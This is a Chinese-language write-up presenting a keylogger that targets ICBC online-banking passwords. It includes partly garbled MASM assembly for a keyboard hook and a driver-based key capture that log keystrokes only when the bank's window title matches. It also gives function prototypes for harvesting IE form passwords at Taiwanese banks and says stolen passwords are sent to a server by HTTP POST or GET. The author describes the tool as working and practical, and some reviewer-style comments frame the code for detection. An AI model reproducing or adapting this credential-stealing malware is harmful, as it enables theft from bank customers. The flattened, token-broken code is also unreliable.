银行密码安全文档格式.docx
我的朋友做了这方面的实验,针对中国工商银行新一代网上银行
这部分做了修改,确实非常有效果,实现了对新一代网银密码的抓取:
; Data segment of the key-logging sample quoted in this document.
; The listing was flattened during extraction (one token per line, some tokens
; lost), so it does not assemble as shown; these notes describe only what is
; still visible on the page.
;
; Strings in this segment that can be searched for when triaging a host or a binary:
;   - the object name Global\zkl (label onlyOneCopy); presumably a
;     single-instance marker - the call that uses it is not in this listing
;   - the log file name ZKeyLog.txt (label MyFileName)
;   - the window-title text stored at label Vist, which KeyBoardProc compares
;     with the title of the foreground window
;
; vist_flage is followed by 0 here; KeyBoardProc stores 5Ah to it after a title
; match and FillKeyInfo tests it for 5Ah before writing a key name to hFile.
; The URL label points at localhost in this copy - presumably a stand-in value;
; the code that uses URL, IEPath and IEHandle is not shown.
.data
g_hDevice
HANDLE
?
g_hEvent
g_hInstance
HINSTANCE?
g_hwndDlg
HWND
g_hwndListView
g_fExitNow
BOOL
g_fAlwaysOnTop
g_dwDlgWidth
DWORD
g_hPopupMenu
HMENU
CopyRight
db
"
CopyRight2006,"
Vist
中国工商银行新一代网上银行"
vist_flage
0
hBuffer
dd
hComputerName
db
32
dup(0)
hCurrentThreadPiDdd
hCurrentWindow
hDateFormat
yyyy:
MM:
dd"
0
;
ddMMMyyyy"
0
hDomaineName
128dup(0)
hFile
hHook
hmodul
MODULEENTRY32
<
>
hSnapShot
dd
hTimeFormat
hh:
mm:
sstt"
0
hUserName
msg
MSG
onlyOneCopy
Global\zkl"
0
Tempdb4096dup(0),0
IEPathdb"
:
\ProgramFiles\InternetExplorer\IEXPLORE.EXE"
0;
前面的空格用于放驱动器
URLdb"
http:
//localhost/name1.txt"
注意,有一个空格在网址前面
;
testdadadb"
sfd"
IEHandleHANDLE?
用于关闭IE页面
FileMemDWORD?
//文件内容
FileMemSizeDWORD0;
//文件长度
MyFileNamedb"
ZKeyLog.txt"
; KeyBoardProc(nCode, wParam, lParam) - keyboard hook callback of the sample.
; The call that installs the hook is not in this listing; hHook is only seen
; as the first argument of CallNextHookEx.
;
; Steps still visible in the extraction:
;   1. zero the 256-byte lpKeyState buffer (rep stosd, 256/4 dwords)
;   2. leave through next_hook for WM_KEYUP and WM_SYSKEYUP
;   3. take the foreground window handle and compare it with hCurrentWindow
;   4. on a change: read the window class name, local date and time, the
;      process id of the window, the first module entry of a Toolhelp
;      snapshot of that process, and the window text
;   5. compare the window text with the string at Vist; on mismatch jump to
;      next_hook, otherwise store 5Ah to vist_flage
;   6. write a heading (time, date, exe path, window title, window class) to
;      hFile with fprintf and flush it
;   7. next_hook stores 00h to vist_flage and chains to CallNextHookEx
;
; NOTE(review): several mnemonics and the no_window_change label are missing
; from this extraction, so the exact branch structure between these steps
; cannot be confirmed from the page.
;
; Behaviour a monitoring tool can key on: a hook procedure that, on key
; events, queries the foreground window title, compares it with a fixed
; banking-site string and then writes to a local log file.
KeyBoardProc
PROCnCode:
DWORD,wParam:
DWORD,lParam:
LOCAL
lpKeyState[256]
BYTE
lpClassName[64]
lpCharBuf[32]
lpDateBuf[12]
lpTimeBuf[12]
lpLocalTime:
SYSTEMTIME
----------------------------
leaedi,[lpKeyState];
letszerooutourbuffers
push
256/4
pop
ecx
xoreax,eax
repstosd
setsusupfordoublewordfromEAX
mov
eax,wParam
cmp
eax,WM_KEYUP
onlyneedWM_KEYDOWN
je
next_hook
bypassdoublelogging
eax,WM_SYSKEYUP
onlyNeedWM_SYSKEYDOWN
bypassdoublelogging
invokeGetForegroundWindow
gethandleforcurrentlyusedwindow(specifictoNT)
[hCurrentWindow],eax
ifitsnotdifferenttolastonesaved..
no_window_change
bypassalltheheadings
saveitforusenowandcomparelater
invokeGetClassName,hCurrentWindow,ADDRlpClassName,64
invoke
GetLocalTime,ADDRlpLocalTime
invokeGetDateFormat,NULL,NULL,ADDRlpLocalTime,ADDRhDateFormat,ADDRlpDateBuf,12
invokeGetTimeFormat,NULL,NULL,ADDRlpLocalTime,ADDRhTimeFormat,ADDRlpTimeBuf,12
invokeGetWindowThreadProcessId,hCurrentWindow,ADDRhCurrentThreadPiD
CreateToolhelp32Snapshot,TH32CS_SNAPMODULE,hCurrentThreadPiD
mov
hSnapShot,eax
hmodul.dwSize,sizeofMODULEENTRY32
Module32First,hSnapShot,addrhmodul
CloseHandle,hSnapShot
invokeGetWindowText,hCurrentWindow,ADDRlpKeyState,256
; Title gate: ecx = 8 and repe cmpsw compare the window text held in
; lpKeyState with Vist; the heading written below is reached only on a match.
********************
movecx,8
leaesi,[lpKeyState]
leaedi,[Vist]
cld
repecmpsw
jnznext_hook
movbyteptr[vist_flage],5ah
*********************
lea
esi,[hmodul.szExePath]
printthecurrentprogramexename
esi
lea
esi,[lpTimeBuf]
printtheformattedtime
esi,[lpDateBuf]
printtheformatteddate
pushz
13,10,13,10,"
[%s,%s-程序名:
%s]"
[hFile]
call
fprintf
writethebuffertocache
add
esp,3*4
leaesi,[lpClassName]
printthecurrentwindowclassname
leaesi,[lpKeyState];
printthecurrentwindowtitle
13,10,"
[窗口标题:
%s-窗口类:
13,10
invokefflush,hFile
next_hook:
movbyteptr[vist_flage],00h
invokeCallNextHookEx,hHook,nCode,wParam,lParam
ENDP
:
FillKeyInfo
; FillKeyInfo(paKeyData, cb) - turns KEY_DATA records into key names.
;
; Steps still visible in the extraction:
;   - esi walks the records at paKeyData (advanced by sizeof KEY_DATA)
;   - the GetKeyNameText argument is dwScanCode shifted left by 16, with
;     bit 24 set when Flags has KEY_E0
;   - when Flags masked with KEY_MAKE+KEY_BREAK equals KEY_BREAK and
;     vist_flage holds 5Ah, the key name in buffer is written to hFile
;   - hFile is flushed and the list view is scrolled to its last item
;
; NOTE(review): the loop construct that consumes cb bytes of records and the
; list-view insert calls are not present in this extraction.
;
; Relevance for analysis: file writes here are gated on vist_flage, i.e. on
; the title match made in KeyBoardProc, so the log grows only in that state.
FillKeyInfoprocusesesiebxpaKeyData:
PTRKEY_DATA,cb:
UINT
locallvi:
LV_ITEM
localbuffer[32]:
CHAR
movesi,paKeyData
assumeesi:
ptrKEY_DATA
moveax,cb
movlvi.imask,LVIF_TEXT
ListView_GetItemCountg_hwndListView
movlvi.iItem,eax
movedx,[esi].dwScanCode
shledx,16
moveax,[esi].Flags
andeax,KEY_E0
.ifeax!
=0
oredx,1SHL24
.endif
invokeGetKeyNameText,edx,addrbuffer,sizeofbuffer
KeyName
andeax,(KEY_MAKE+KEY_BREAK)
Iknowit'
sthesameasandingwithKEY_BREAK
.ifeax==KEY_BREAK
.ifbyteptr[vist_flage]==5ah
invokefprintf,hFile,addrbuffer
.endif
addesi,sizeofKEY_DATA
invoke
fflush,hFile
ListView_GetItemCountg_hwndListView
deceax
Makeindexzero-based
ListView_EnsureVisibleg_hwndListView,eax,FALSE
nothing
FillKeyInfoendp
WaitForKeyData
; WaitForKeyData(hEvent) - worker thread that fetches key records from a
; driver through the device handle g_hDevice.
;
; Steps still visible in the extraction:
;   - allocate a buffer of cbKeyData bytes with malloc
;   - loop: WaitForSingleObject(hEvent, INFINITE); leave the loop when
;     g_fExitNow is TRUE
;   - Sleep 100, then DeviceIoControl(g_hDevice, IOCTL_GET_KEY_DATA) into
;     paKeyData; when the call returns non-zero and dwBytesReturned is
;     non-zero, pass the data to FillKeyInfo
;   - Sleep 900 before the next request
;   - on a failed wait, show a message box and leave the loop
;   - free the buffer and call ExitThread(0)
;
; NOTE(review): the driver, the code that opens g_hDevice and the definition
; of IOCTL_GET_KEY_DATA are not on this page.
;
; Behaviour a monitoring tool can key on: a user-mode process that keeps a
; handle to a key-capture device object and issues the same IOCTL after each
; event signal, spaced by the two Sleep calls.
WaitForKeyDataprochEvent:
HANDLE
localpaKeyData:
PKEY_DATA
localcbKeyData:
localdwBytesReturned:
movcbKeyData,KEY_DATA*MAX_KEY_DATA_ENTRIES
invokemalloc,cbKeyData
=NULL
movpaKeyData,eax
.whileTRUE
invokeWaitForSingleObject,hEvent,INFINITE
=WAIT_FAILED
.break.ifg_fExitNow==TRUE
Waitforkeywillbereleased.
Otherwisewewillgetkeymake
andkeybreakinseparate"
GetKeyData"
request.
invokeSleep,100
invokeDeviceIoControl,g_hDevice,IOCTL_GET_KEY_DATA,NULL,0,\
paKeyData,cbKeyData,addrdwBytesReturned,NULL
.if(eax!
=0)&
&
(dwBytesReturned!
=0)
invokeFillKeyInfo,paKeyData,dwBytesReturned
Wewaitalittletonotaskdrivertoooften.
invokeSleep,900
.else
invokeMessageBox,g_hwndDlg,\
$CTA0("
Waitfailed.Threadnowexits.Restartapplication."
),NULL,MB_ICONERROR
.break
invokefree,paKeyData
invokeExitThread,0
ret
Neverexecuted.
WaitForKeyDataendp
2.IE框架代码的密码抓取
见下图,实现台湾几大银行密码的抓取
// Only these three prototypes appear on the page; the function bodies are not shown.
DWORDWINAPIEnumIE(LPVOIDlpParam);
// Enumerates browser instances
voidEnumFrame(IHTMLDocument2*pIHTMLDocument2);
// Enumerates the sub-frames of an IE document
voidEnumForm(IHTMLDocument2*pIHTMLDocument2);
// Enumerates the forms of an IE document
这个程序已经实用化,当然要考虑抓密码的程序如何把密码发送到服务器,这里一般的办法不是通过邮件,而是通过HTTPPOST方法,或者是HTTPGET加参数的办法提交密码数据,我这里也就不多说了
总结一下:
有关网银大盗并不神秘,一般的抓密码的方法基本都不可取,现在基本就是驱动键盘钩子,还有就是IE表单的办法.
有希望交流的,可以发送邮件给我,x_database@
感谢:
非常感谢“教主”,我参见了“教主”的一些代码,他是这个安全行业里的牛人,非常感谢.